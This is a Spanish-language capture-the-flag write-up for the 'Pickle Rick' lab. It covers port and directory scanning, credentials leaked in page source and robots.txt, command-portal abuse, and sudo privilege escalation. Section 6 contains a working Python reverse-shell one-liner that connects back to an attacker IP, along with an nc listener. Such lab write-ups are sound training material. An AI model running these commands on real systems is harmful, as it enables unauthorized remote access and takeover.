Pickle Rick

Introducción

Este informe detalla el proceso de enumeración y análisis inicial realizado sobre el host rick.thm (10.10.229.244) utilizando la herramienta Nmap. Se describen los hallazgos relevantes, los servicios expuestos, así como los pasos siguientes para la explotación y escalada de privilegios.

1. Escaneo de Puertos con Nmap

El primer paso fue realizar un escaneo de puertos con Nmap utilizando las opciones -A -sT, que permiten la detección avanzada de servicios y sistemas operativos. Se guardó la salida en un archivo resultado.txt para su posterior análisis.

Comando utilizado:

nmap -A -sT rick.thm -oN resultado.txt

Resultados obtenidos:

Host: rick.thm (10.10.229.244)
Estado: Activo (latencia 0.18s)
Puertos abiertos:
- **22/tcp**: OpenSSH 8.2p1 (Ubuntu 4ubuntu0.11)
- **80/tcp**: Apache HTTP 2.4.41 (Ubuntu)

2. Análisis del Código Fuente del Sitio Web

Se encontró un comentario en el código fuente con el nombre de usuario:

<!-- Username: R1ckRul3s -->

3. Exploración de Directorios con Gobuster

Se utilizó Gobuster para la búsqueda de directorios ocultos y archivos accesibles:

gobuster dir -u http://rick.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50

Resultados encontrados:

/login.php            (Status: 200)
/index.html           (Status: 200)
/assets               (Status: 301)
/portal.php           (Status: 302) -> /login.php
/robots.txt           (Status: 200)

En robots.txt, se encontró la siguiente información:

WubbaLubbaDubDub

4. Autenticación en el Portal Web

Se intentó el acceso en /login.php con las credenciales:

Usuario: R1ckRul3s
Contraseña: WubbaLubbaDubDub

El acceso fue exitoso y se redirigió al portal /portal.php.

5. Descubrimiento de Archivos Mediante Comandos

Dentro del portal, en la pestaña Commands, se ejecutó ls, obteniendo:

Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt

Dado que otros archivos estaban bloqueados, se intentó acceder directamente a http://rick.thm/Sup3rS3cretPickl3Ingred.txt, lo cual permitió encontrar el primer ingrediente.

6. Creación de una Consola de Conexión Remota

Para obtener acceso interactivo al sistema, se estableció una reverse shell utilizando Python.

Comando utilizado en el servidor (Rick.thm):

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.6.17.22",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Configuración en la máquina atacante:

nc -lvnp 4444

Tras la ejecución de estos comandos, se logró acceso remoto al sistema.

7. Obtención de Información Clave

Al explorar el sistema, en la ruta /home/rick/, se encontró un archivo llamado "second ingredients". Al visualizar su contenido, se obtuvo la clave secreta:

********

8. Escalada de Privilegios

Se detectó que el usuario podía ejecutar comandos con sudo, lo que permitió escalar privilegios con el siguiente comando:

sudo /bin/bash

Una vez en modo root, se accedió al archivo en /root/3rd.txt, obteniendo el último ingrediente:

**********

9. Conclusión y Pasos Finales

Se logró acceso inicial al sistema mediante credenciales obtenidas en el código fuente.
Se identificaron archivos clave en el sistema y se accedió a información sensible.
Se escaló privilegios con sudo y se accedió al último ingrediente.

AnteriorLookup SiguienteThe Sticker Shop

Última actualización hace 8 meses

hashtagIntroducción

hashtag1. Escaneo de Puertos con Nmap

hashtagComando utilizado:

hashtagResultados obtenidos:

hashtag2. Análisis del Código Fuente del Sitio Web

hashtag3. Exploración de Directorios con Gobuster

hashtagResultados encontrados:

hashtag4. Autenticación en el Portal Web

hashtag5. Descubrimiento de Archivos Mediante Comandos

hashtag6. Creación de una Consola de Conexión Remota

hashtagComando utilizado en el servidor (Rick.thm):

hashtagConfiguración en la máquina atacante:

hashtag7. Obtención de Información Clave

hashtag8. Escalada de Privilegios

hashtag9. Conclusión y Pasos Finales